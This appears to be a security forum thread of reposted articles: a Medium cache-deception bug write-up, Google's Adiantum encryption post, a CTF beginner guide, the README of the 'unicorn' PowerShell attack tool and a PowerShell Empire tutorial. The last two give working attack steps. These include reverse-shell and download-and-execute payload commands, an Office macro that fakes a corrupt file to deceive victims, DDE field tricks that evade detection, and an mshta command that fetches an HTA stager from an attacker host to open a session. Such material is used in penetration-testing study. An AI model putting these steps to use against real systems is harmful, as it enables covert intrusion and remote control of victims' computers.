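    return directly_under_root and path.endswith(STATIC_EXTENSIONS)

def should_cache(content_type, cache_control):
    # Safer rule: decide from the response itself. A dynamic HTML
    # page served with "no-store" is never cached, regardless of
    # how file-like its URL looks.
    return "no-store" not in cache_control and content_type.startswith("image/")
```

Under the flawed rule, `/@yuval.png` is treated as a cacheable image; under the header-based rule, the same request is recognized as an uncacheable HTML page.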
The fact that each cached response stayed there for 4 hours and blocked other responses from being cached wasn't a problem, because by using a simple script usernames can be changed repeatedly (generating new URLs that aren't cached yet).

Note that this bug could also have been used by users who wanted to hide the "block user" option on their own profile page, by repeatedly visiting it (again, using a script). This would work because users don't have the option to block themselves on their own profile, and so others wouldn't have it either when they receive a cached response that was created for the account owner.

Report Timeline

I sent Medium my report through their bug bounty program, and here's the timeline:

Aug 24 — Sent my initial report, and received an automatic email which said that Medium would try to get back to me within 48 hours.
Sep 14 — Checked with them if something wasn't clear, since they hadn't responded yet.
Nov 1 — Issued another message, saying it was fine with me if my report got rejected, and asking for a response so I would know they received it.
Nov 20 — Response from Medium! Apologizing for the delay and rewarding my bug with $100 and a shirt.

I guess it took them a while because Cache Deception isn't the usual kind of bug people report — but I was just hoping for a quick response asking me for more explanation or something. I assumed no one was reading their inbox. P.S. the bug was rewarded only $100 because Medium's program is small, not because it's lame :P

Cache Based Attacks — Further Reading

Cache-based attacks have been known for a long time, but were considered mostly theoretical until the recent publication of two outstanding works by Omer Gil and James Kettle. If you find the subject interesting, don't miss these:

Web Cache Deception Attack — Omer Gil, Feb 2017
While demonstrating it on PayPal, Omer coins the term Cache Deception for this new and amazing attack vector.
Practical Web Cache Poisoning — James Kettle, Aug 2018
Cache Poisoning has been known for years, but by publishing his extensive research James made it practical. Check out his follow-up article on the subject, "Bypassing Web Cache Poisoning Countermeasures", too.

See you next time…

Yuval Shprinz
Cybersecurity hobbyist, university student, Age of Mythology pro

Sursa: https://medium.freecodecamp.org/cache-deception-how-i-discovered-a-vulnerability-in-medium-and-helped-them-fix-it-31cec2a3938b
  17. Introducing Adiantum: Encryption for the Next Billion Users February 7, 2019 Posted by Paul Crowley and Eric Biggers, Android Security & Privacy Team Storage encryption protects your data if your phone falls into someone else's hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted. Today, Android offers storage encryption using the Advanced Encryption Standard (AES). Most new Android devices have hardware support for AES via the ARMv8 Cryptography Extensions. However, Android runs on a wide range of devices. This includes not just the latest flagship and mid-range phones, but also entry-level Android Go phones sold primarily in developing countries, along with smart watches and TVs. In order to offer low cost options, device manufacturers sometimes use low-end processors such as the ARM Cortex-A7, which does not have hardware support for AES. On these devices, AES is so slow that it would result in a poor user experience; apps would take much longer to launch, and the device would generally feel much slower. So while storage encryption has been required for most devices since Android 6.0 in 2015, devices with poor AES performance (50 MiB/s and below) are exempt. We've been working to change this because we believe that encryption is for everyone. In HTTPS encryption, this is a solved problem. The ChaCha20 stream cipher is much faster than AES when hardware acceleration is unavailable, while also being extremely secure. It is fast because it exclusively relies on operations that all CPUs natively support: additions, rotations, and XORs. For this reason, in 2014 Google selected ChaCha20 along with the Poly1305 authenticator, which is also fast in software, for a new TLS cipher suite to secure HTTPS internet connections. 
ChaCha20-Poly1305 has been standardized as RFC7539, and it greatly improves HTTPS performance on devices that lack AES instructions. However, disk and file encryption present a special challenge. Data on storage devices is organized into "sectors" which today are typically 4096 bytes. When the filesystem makes a request to the device to read or write a sector, the encryption layer intercepts that request and converts between plaintext and ciphertext. This means that we must convert between a 4096-byte plaintext and a 4096-byte ciphertext. But to use RFC7539, the ciphertext must be slightly larger than the plaintext; a little space is needed for the cryptographic nonce and message integrity information. There are software techniques for finding places to store this extra information, but they reduce efficiency and can impose significant complexity on filesystem design. Where AES is used, the conventional solution for disk encryption is to use the XTS or CBC-ESSIV modes of operation, which are length-preserving. Currently Android supports AES-128-CBC-ESSIV for full-disk encryption and AES-256-XTS for file-based encryption. However, when AES performance is insufficient there is no widely accepted alternative that has sufficient performance on lower-end ARM processors. To solve this problem, we have designed a new encryption mode called Adiantum. Adiantum allows us to use the ChaCha stream cipher in a length-preserving mode, by adapting ideas from AES-based proposals for length-preserving encryption such as HCTR and HCH. On ARM Cortex-A7, Adiantum encryption and decryption on 4096-byte sectors is about 10.6 cycles per byte, around 5x faster than AES-256-XTS. Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa. 
It works by first hashing almost the entire plaintext using a keyed hash based on Poly1305 and another very fast keyed hashing function called NH. We also hash a value called the "tweak" which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction. This is arranged in a configuration known as a Feistel network, so that we can decrypt what we've encrypted. A single AES-256 invocation on a 16-byte block is also required, but for 4096-byte inputs this part is not performance-critical. Cryptographic primitives like ChaCha are organized in "rounds", with each round increasing our confidence in security at a cost in speed. To make disk encryption fast enough on the widest range of devices, we've opted to use the 12-round variant of ChaCha rather than the more widely used 20-round variant. Each round vastly increases the difficulty of attack; the 7-round variant was broken in 2008, and though many papers have improved on this attack, no attack on 8 rounds is known today. This ratio of rounds used to rounds broken today is actually better for ChaCha12 than it is for AES-256. Even though Adiantum is very new, we are in a position to have high confidence in its security. In our paper, we prove that it has good security properties, under the assumption that ChaCha12 and AES-256 are secure. This is standard practice in cryptography; from "primitives" like ChaCha and AES, we build "constructions" like XTS, GCM, or Adiantum. Very often we can offer strong arguments but not a proof that the primitives are secure, while we can prove that if the primitives are secure, the constructions we build from them are too. We don't have to make assumptions about NH or the Poly1305 hash function; these are proven to have the cryptographic property ("ε-almost-∆-universality") we rely on. 
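The hash-encrypt-hash "sandwich" described above can be illustrated with a toy length-preserving wide-block mode. This is a deliberately simplified sketch, NOT the Adiantum specification: real Adiantum uses NH/Poly1305 for the hash layers, ChaCha12 for the stream, and an invertible AES-256 block where this toy substitutes a key XOR. The point is the structure: a keyed hash of the bulk folds into a small block, which seeds the stream cipher, and a mirrored hash on the way out makes decryption exactly reverse encryption.

```python
import hashlib
import hmac

BLOCK = 16  # size of the small "right" block, like Adiantum's 16-byte AES block

def _h(key, tweak, data):
    # Keyed hash of (tweak, bulk) -> 16 bytes (stand-in for NH/Poly1305).
    return hmac.new(key, tweak + data, hashlib.sha256).digest()[:BLOCK]

def _stream(key, nonce, n):
    # Counter-mode keystream seeded by a 16-byte nonce (stand-in for ChaCha12).
    out = b""
    for ctr in range((n + 31) // 32):
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
    return out[:n]

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def encrypt(kh, ks, ke, tweak, pt):
    pl, pr = pt[:-BLOCK], pt[-BLOCK:]
    pm = _xor(pr, _h(kh, tweak, pl))          # hash layer in
    cm = _xor(pm, ke)                         # toy invertible block (real: AES-256)
    cl = _xor(pl, _stream(ks, cm, len(pl)))   # stream layer over the bulk
    cr = _xor(cm, _h(kh, tweak, cl))          # hash layer out
    return cl + cr

def decrypt(kh, ks, ke, tweak, ct):
    cl, cr = ct[:-BLOCK], ct[-BLOCK:]
    cm = _xor(cr, _h(kh, tweak, cl))
    pl = _xor(cl, _stream(ks, cm, len(cl)))
    pm = _xor(cm, ke)
    pr = _xor(pm, _h(kh, tweak, pl))
    return pl + pr
```

Because the small block depends on a hash of the whole bulk, flipping any plaintext bit changes the nonce and therefore the entire ciphertext, which is the wide-block property the post describes.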
Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion. Additional resources The full details of our design, and the proof of security, are in our paper Adiantum: length-preserving encryption for entry-level processors in IACR Transactions on Symmetric Cryptology; this will be presented at the Fast Software Encryption conference (FSE 2019) in March. Generic and ARM-optimized implementations of Adiantum are available in the Android common kernels v4.9 and higher, and in the mainline Linux kernel v5.0 and higher. Reference code, test vectors, and a benchmarking suite are available at https://github.com/google/adiantum Android device manufacturers can enable Adiantum for either full-disk or file-based encryption on devices with AES performance <= 50 MiB/sec and launching with Android Pie. Where hardware support for AES exists, AES is faster than Adiantum; AES must still be used where its performance is above 50 MiB/s. In Android Q, Adiantum will be part of the Android platform, and we intend to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms. Acknowledgements: This post leveraged contributions from Greg Kaiser and Luke Haviland. Adiantum was designed by Paul Crowley and Eric Biggers, implemented in Android by Eric Biggers and Greg Kaiser, and named by Danielle Roberts. Sursa: https://security.googleblog.com/2019/02/introducing-adiantum-encryption-for.html
  18. Over the past couple of weeks I've been doing a lot of CTFs (Capture the Flag) - old and new. And I honestly can't believe what I've been missing out on. I've learned so much during this time by just playing the CTFs, reading write-ups, and even watching the solutions on YouTube. This allowed me to realize how much I still don't know, and allowed me to see where the gaps in my knowledge were.

One of the CTFs that was particularly interesting to me was the Google CTF. The reason why I really liked Google's CTF was because it allowed for both beginners and experts to take part, and even allowed people new to CTFs to try their hands at some security challenges. I opted to go for the beginner challenges to see where my skill level really was at - and although it was "mostly" easy, there were still some challenges that had me banging my head on the desk and Googling like a mad man. Even though the Google CTF was over and solutions were online, I avoided them at all costs because I wanted to learn the "hard way".

These beginner challenges were presented in a "Quest" style with a scenario similar to a real world penetration test. Such a scenario is awesome for those who want to sharpen their skills and learn something new about CTFs and security, while also allowing them to see real world value and impact.

Now, some of you might be wondering… "How much do I need to know or learn to be able to do a CTF?" or "How hard are CTFs?" Truth be told, it depends. Some CTFs can be way more complex than others; DEFCON's CTF and even Google's CTF can be quite complex and complicated - but not impossible! It solely depends on your area of expertise. There are many CTF teams that have people who specialize in Code Review and Web Apps and can do Web Challenges with their eyes closed, but give them a binary and they won't know the difference between EIP and ESP. The same goes for others!
Sure, there are people who are the "Jack of All Trades" and can do pretty much anything, but that doesn't make them an expert in everything. After reading this, you might be asking me - But I've never done a CTF before! How do I know if I'm ready to attempt one? Honestly, you'll never be ready! There will always be something new to learn, something new you have never seen before, or something challenging that pushes the limits of your knowledge, even as an expert! That's the whole point of CTFs. But, there are resources that can help you get started!

Let's start by explaining what a CTF really is! CTF Time does a good job at explaining the basics, so I'm just going to quote them (with some "minor" editing)!

Capture the Flag (CTF) is a special kind of information security competition. There are three common types of CTFs: Jeopardy, Attack-Defense and mixed.

Jeopardy-style CTFs have a couple of questions (tasks) in a range of categories. For example, Web, Forensic, Crypto, Binary, PWN or something else. Teams compete against each other and gain points for every solved task. The more points for a task, the more complicated the task. Usually certain tasks appear in chains, and can only be opened after someone on the team solves the previous task. Once the competition is over, the team with the highest amount of points wins!

Attack-defense is another interesting type of competition. Here every team has their own network (or only one host) with vulnerable services. Your team has time for patching and usually has time for developing exploits against these services. Then the organizers connect the participants of the competition to a single network and the wargame starts! Your goal is to protect your own services for defense points and to hack your opponents for attack points. Some of you might know this format if you ever competed in the CCDC.

Mixed competitions may contain many possible formats. They might be a mix of challenges with attack/defense.
We usually don't see much of these. Such CTF games often touch on many other aspects of security such as cryptography, steganography, binary analysis, reverse engineering, web and mobile security and more. Good teams generally have strong skills and experience in all these issues, or contain players who are well versed in certain areas.

LiveOverflow also has an awesome video explaining CTFs along with examples on each aspect - see below!

Overall, CTFs are timed games where hackers compete against each other (either in teams or alone) to find bugs and solve puzzles to find "flags" which count for points. The team with the most points at the end of the CTF is the winner!

Now that we have a general idea of what a CTF is and what it contains, let's learn how we can get started in playing CTFs! Once again, LiveOverflow has an amazing video explaining why CTFs are a great way to learn hacking. This video was a live recording of his FSEC 2017 talk that aimed to "motivate you to play CTFs and showcase various example challenge solutions, to show you stuff you hopefully haven't seen before and get you inspired to find more interesting vulnerabilities".

There are also a ton of resources online that aim to teach you the basics of Vulnerability Discovery, Binary Exploitation, Forensics, and more, such as the following:

CTF Field Guide
CTF Resources
Endgame - How To Get Started In CTF
CONFidence 2014: On the battlefield with the Dragons – G. Coldwind, M. Jurczyk
If You Can Open The Terminal, You Can Capture The Flag: CTF For Everyone
So You Want To Be a Pentester? <– Shameless plug because of resources!

Out of all these resources, I believe that CTF Series: Vulnerable Machines is honestly the BEST resource for CTFs.
Its aim is mostly focused on how to approach vulnerable VMs like the ones on VulnHub and Hack The Box, but it still gives you a ton of examples and resources on how to find certain vulnerabilities, how to utilize given tools, and how to exploit vulnerabilities.

As I said time and time again, learning the basics will drastically help improve your CTF skills. Once you get enough experience you'll start to notice "patterns" in certain code, binaries, web apps, etc. which will allow you to know if a particular vulnerability exists and how it can be exploited.

Another thing that can help you prepare for CTFs is to read write-ups on new bugs and vulnerabilities. A ton of Web CTF challenges are based off of these bugs and vulnerabilities or are a variant of them - so if you can keep up with new findings and understand them, then you're ahead of the curve. The following links are great places to read about new bugs and vulnerabilities. They are also a good place to learn how others exploited known bugs. HINT: These links can also help you get into Bug Bounty Hunting!

Hackerone - Hacktivity
Researcher Resources - Bounty Bug Write-ups
Orange Tsai
Detectify Blog
InfoSec Writeups
Pentester Land - Bug Bounty Writeups
The Daily Swig - Web Security Digest

Once we have a decent understanding of a certain field such as Web, Crypto, Binary, etc. it's time we start reading and watching other people's writeups. This will allow us to gain an understanding of how certain challenges are solved, and hopefully it will also teach us a few new things. The following links are great places to read and watch CTF solutions:

CTF Time - Writeups
CTFs Github - Writeups, Resources, and more!
Medium - CTF Writeups
LiveOverflow Youtube
Gynvael Coldwind
Murmus CTF
John Hammond

Now that you have the basic skills and know a little more about certain topics, it's time to find a CTF! CTF Time is still one of the best resources for looking at upcoming events that you can participate in.
You can go through the events and see what interests you! Once you choose something, follow the instructions to register and you're done! From there, all you need to do is wait for the CTF to start, and hack away!

Okay, seems easy enough - but then again, for a first time it's still overwhelming! So what can we do to make our first CTF experience a good one? Well, that's where the Google CTF comes in! As I stated before, the reason why I really liked Google's CTF was because it allowed for both beginners and experts to take part, and even allowed people new to CTFs to try their hands at some security challenges without adding too much pressure.

The Beginner Quest starts off with a little back story to "lighten" the mood and let the player know that this is just a game. We aren't competing for a million dollars, so take it easy and have fun! The story is as follows:

Once we read the story, we can start with the challenges. These beginner challenges were presented in a "Quest" style based off the story scenario. The quest has a total of nineteen (19) challenges as shown below in the quest map - with each color representing a different category as follows:

Purple: Miscellaneous
Green: Exploitation/Buffer Overflows & Reverse Engineering
Yellow: Reverse Engineering
Blue: Web Exploitation

If you click on one of the circles then you will go to the respective challenge. The challenge will contain some information, along with either an attachment or a link. From there, try to solve the challenge and find the flag, which is in the CTF{} format. Submitting the correct flag will complete the challenge.

Now notice how some of these challenges are "grayed out". That's because these challenges are "chained" to one another, meaning that you need to complete the previous one to open the path to the next challenge. Also notice that Google allows you to make choices on which challenge you want to do.
They don't force you to do all of them to get to the END, but give you the ability to pick and choose another path if something is too hard, thus making it easier for you to feel accomplishment and to later come back and learn!

Alright, that's it for now. Hopefully you learned something new today, and I sincerely hope that the resources will allow you to learn and explore new topics! The posts following this one will detail how I solved the 2018 Google CTF - Beginners Quest, so stay tuned, and I hope to see you on the CTF battlefield someday!

Updated: February 06, 2019

Jack Halon
I like to break into things; both physically and virtually.

Sursa: https://jhalon.github.io/2018-google-ctf-beginners-intro/
  19. Have you signed up? For those who don't know what this is about:

1. It's a CTF competition
2. Many countries from Europe participate
3. After the qualification stage, 20-30 people will be selected to attend a bootcamp - a one-week security training with much more (it's worth it!)
4. From those people, approximately 10 will be selected to represent Romania at the ECSC

If we're no good at football and the national team hasn't played anything in years, at least in security let's show everyone that we know what we're doing.
  20. unicorn
    unicorn Written by: Dave Kennedy (@HackingDave) Website: https://www.trustedsec.com Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit. root@rel1k:~/Desktop# python unicorn.py ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= -------------------- Magic Unicorn Attack Vector ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. 
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

-----POWERSHELL ATTACK INSTRUCTIONS----

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed to inject the PowerShell attack into memory. Note that you will need some form of remote command execution to deliver it - often through an Excel/Word doc, psexec_commands inside of Metasploit, SQL injection, and so on. There are many scenarios where you can use this attack. Simply paste the powershell_attack.txt command into any command prompt window, or anywhere you have the ability to call the powershell executable, and it will give a shell back to you. This attack also supports windows/download_exec as a payload method instead of just Meterpreter payloads.
When using download and exec, simply run python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the PowerShell code will download the payload and execute it. Note that you will need to have a listener enabled in order to capture the attack.

-----MACRO ATTACK INSTRUCTIONS----

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a Developer tab. Create a new macro, call it Auto_Open, and paste the generated code into it. This will run automatically. Note that a message will be shown to the user saying that the file is corrupt, and the Excel document will close automatically. THIS IS NORMAL BEHAVIOR! It tricks the victim into thinking the Excel document is corrupted. You should get a shell through PowerShell injection after that. If you are deploying this against Office365/2016+ versions of Word, you need to modify the first line of the output from: Sub Auto_Open() to: Sub AutoOpen(). The name of the macro itself must also be "AutoOpen" instead of the legacy "Auto_Open" naming scheme. NOTE: WHEN COPYING AND PASTING INTO EXCEL, IF ADDITIONAL SPACES ARE ADDED YOU NEED TO REMOVE THEM AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL OCCUR!

-----HTA ATTACK INSTRUCTIONS----

The HTA attack will automatically generate two files: index.html, which tells the browser to use Launcher.hta, which in turn contains the malicious PowerShell injection code. All files are exported to the hta_attack/ folder and there will be three main files: index.html, Launcher.hta, and the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. A user must click allow and accept when using the HTA attack in order for the PowerShell injection to work properly.
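Under the hood, the one-liner in powershell_attack.txt relies on PowerShell's -EncodedCommand flag, which takes a base64-encoded UTF-16LE script. A minimal sketch of that encoding step (the Write-Output script is a harmless stand-in, not unicorn's actual output, which also carries the downgrade/injection stub):

```shell
# Encode a PowerShell one-liner the way -EncodedCommand expects:
# the script text as UTF-16LE bytes, then base64.
ps_script="Write-Output 'Hello from memory'"
encoded=$(printf %s "$ps_script" | iconv -f UTF-8 -t UTF-16LE | base64 -w0)
echo "powershell -NoProfile -EncodedCommand $encoded"
```

Reversing the pipeline (base64 -d, then iconv -f UTF-16LE) recovers the original script, which is also a quick way to inspect what a captured -enc payload actually does.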
-----CERTUTIL Attack Instructions----

The certutil attack vector was identified by Matthew Graeber (@mattifestation). It allows you to take a binary file, convert it into a base64 format, and use certutil on the victim machine to convert it back to a binary. This should work on virtually any system and allows you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py <exe_name> crt to get the base64 output. Once that's finished, go to the decode_attack/ folder, which contains the files. The .bat file is a command that can be run on a Windows machine to convert it back to a binary.

-----Custom PS1 Attack Instructions----

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro. Note that if choosing the macro option, a large .ps1 file may exceed the number of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter. Examples:

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

The last one will use a 500-character string instead of the default 380, resulting in fewer carriage returns in VBA.

-----DDE Office COM Attack Instructions----

This attack vector will generate the DDEAUTO formula to place into Word or Excel. The COM objects DDEInitialize and DDEExecute allow formulas to be created directly within Office, which makes it possible to gain remote code execution without the need for macros.
This attack was documented and full instructions can be found at: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

In order to use this attack, run the following examples:

python unicorn.py dde
python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Once generated, a powershell_attack.txt will be created containing the Office code, along with the unicorn.rc file, the listener component, which can be called with msfconsole -r unicorn.rc to handle the listener for the payload. In addition, a download.ps1 will be exported as well (explained below). To apply the payload, as an example (from the SensePost article):

1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click OK
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn
7. Save the Word document

Once the Office document is opened, you should receive a shell through PowerShell injection. Note that DDE is limited in character size, so we use Invoke-Expression (IEX) as the download method. The DDE attack will attempt to download download.ps1, which is our PowerShell injection attack, since we are limited by size restrictions. You will need to move download.ps1 to a location accessible by the victim machine - for example, host it in an Apache2 web directory. You may notice that some of the commands use "{ QUOTE" - these are ways of masking specific commands, documented here: http://staaldraad.github.io/2017/10/23/msword-field-codes/. In this case we are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also check out that URL, as it has some great methods for not calling DDE at all.

-----Import Cobalt Strike Beacon----

This method will import Cobalt Strike Beacon shellcode directly from Cobalt Strike.
Within Cobalt Strike, use the "CS" (C#) export and save it to a file, for example cobalt_strike_file.cs. The exported code will look something like this:

length: 836 bytes */ byte[] buf = new byte[836] { 0xfc, etc

Next, for usage:

python unicorn.py cobalt_strike_file.cs cs

The cs argument tells Unicorn that you want to use the Cobalt Strike functionality. The rest is magic. Next, simply copy the PowerShell command to something where you have the ability for remote command execution. NOTE: THE FILE MUST BE EXPORTED IN THE C# (CS) FORMAT WITHIN COBALT STRIKE TO PARSE PROPERLY.

There are some caveats with this attack. Note that the payload size will be a little over 14k bytes. That means that, from a command-line argument perspective, if you copy and paste you will hit the 8191-character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue; however, if you are launching from PowerShell or other normal applications this is a non-problem. As a couple of examples, wscript.shell and PowerShell use the UNICODE_STRING limit of a USHORT: 65535 / 2 = 32767 characters:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING;

For this attack, if you are launching directly from PowerShell or VBScript (WScript.Shell), there are no issues.

-----Custom Shellcode Generation Method----

This method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code will increase the stack size of powershell.exe (through VirtualAlloc) and inject the shellcode into memory. Note that in order for this to work, the .txt file that you point Unicorn to must be formatted as follows or it will not work: 0x00,0x00,0x00 and so on. Also note that there are size restrictions: the total length of the PowerShell command cannot exceed 8191 characters, the maximum command-line argument size in Windows.
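The 0x00,0x00-style text format described above can be produced from a raw shellcode blob with standard tools; a small sketch (the three-byte NOP/INT3 "shellcode" and the file names here are made up for illustration):

```shell
# Turn a raw binary blob into the 0x..,0x.. text format unicorn expects.
printf '\x90\x90\xcc' > sc.bin
od -An -v -tx1 sc.bin | tr -s ' ' '\n' | grep . | sed 's/^/0x/' \
    | paste -sd, - > shellcode_formatted_properly.txt
cat shellcode_formatted_properly.txt   # -> 0x90,0x90,0xcc
# Rough sanity check against the cmd.exe limit the README warns about:
[ "$(wc -c < shellcode_formatted_properly.txt)" -lt 8191 ] \
    && echo "fits in a cmd.exe command line"
```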
Usage: python unicorn.py shellcode_formatted_properly.txt shellcode

Next, simply copy the PowerShell command to something where you have the ability for remote command execution. NOTE: THE FILE MUST BE PROPERLY FORMATTED IN A 0x00,0x00,0x00 TYPE FORMAT WITH NOTHING OTHER THAN YOUR SHELLCODE IN THE TXT FILE.

There are some caveats with this attack. Note that if your payload is large it will not fit in cmd.exe: from a command-line argument perspective, if you copy and paste you will hit the 8191-character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue; however, if you are launching from PowerShell or other normal applications this is a non-problem. As a couple of examples, wscript.shell and PowerShell use the UNICODE_STRING limit of a USHORT: 65535 / 2 = 32767 characters:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING;

For this attack, if you are launching directly from PowerShell or VBScript (WScript.Shell), there are no issues.

-----SettingContent-ms Extension Method----

First, if you haven't had a chance, head over to the awesome SpecterOps blog from Matt Nelson (enigma0x3): https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

This method uses a specific file type called ".SettingContent-ms", which allows both direct loads from browsers (open + command execution) and embedding in Office products. This one specifically focuses on extension-type settings for command execution within Unicorn's PowerShell attack vector. There are multiple methods supported with this attack vector. Since there is a limited character size with this attack, the method for deployment is an HTA.
For a detailed understanding of weaponizing this attack, visit: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/

To complete this attack, generate your .SettingContent-ms file either standalone or via an HTA. The HTA method supports Metasploit, Cobalt Strike, and direct shellcode attacks. The four usage methods:

HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
HTA Example SettingContent-ms CS: python unicorn.py <cobalt_strike_file.cs> cs ms
HTA Example SettingContent-ms Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode ms
Generate .SettingContent-ms: python unicorn.py ms

The first is a Metasploit payload, the second Cobalt Strike, the third your own shellcode, and the fourth just a blank .SettingContent-ms file. When everything is generated, it will export a file called Standalone_NoASR.SettingContent-ms, either in the default root Unicorn directory (if using the standalone file generation) or under the hta_attack/ folder. You will need to edit the Standalone_NoASR.SettingContent-ms file and replace:

REPLACECOOLSTUFFHERE

with:

mshta http://<apache_server_ip_or_dns_name>/Launcher.hta

Then move the contents of hta_attack/ to /var/www/html. Once the victim clicks the .SettingContent-ms file, mshta will be called on the victim machine, which then downloads the Unicorn HTA file that has the code-execution capabilities.

Special thanks and kudos to Matt Nelson for the awesome research. Also check out: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/

Usage:
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
python unicorn.py <cobalt_strike_file.cs> cs ms
python unicorn.py <path_to_shellcode.txt> shellcode ms
python unicorn.py ms

Sursa: https://github.com/trustedsec/unicorn
  21. Multiple Ways to Exploiting Windows PC using PowerShell Empire

posted in Penetration Testing on February 4, 2019 by Raj Chandel

This is our second post in the article series 'PowerShell Empire'. In this article we will cover all the exploits that lead to Windows exploitation with Empire. For our first post in the Empire series, which gives a basic guide to navigating your way through Empire, click here.

Table of contents:

Exploiting through HTA
Exploiting through MSBuild.exe
Exploiting through regsvr32
XSL exploit
Exploiting through Visual Basic script
BAT exploit
Multi_launcher exploit

Exploiting through HTA

This attack helps us exploit Windows through .hta. When an .hta file is run via mshta.exe, it executes like an .exe with similar functionality, which lets us hack our way through. To know more about this attack, please click here. To start, run './Empire'. Following the workflow, we first have to create a listener on our local machine. Type the following command:

listeners

After running the above command, it will say that "no listeners are currently active", but don't worry - we are now in the listener interface. In this interface, type:

uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type 'back' to go to the listener interface to create an exploit. For this, type:

usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

Running the above commands will create an .hta file to be used as malware.
Start the Python server using the following command, in order to share our .hta file:

python -m SimpleHTTPServer 8080

As the Python server is up and running, type the following command in the victim's command prompt to execute our malicious file:

mshta.exe http://192.168.1.107:8080/1.hta

The moment the above command is executed, you will have your session. To access the session, type:

interact XDGM6HLE
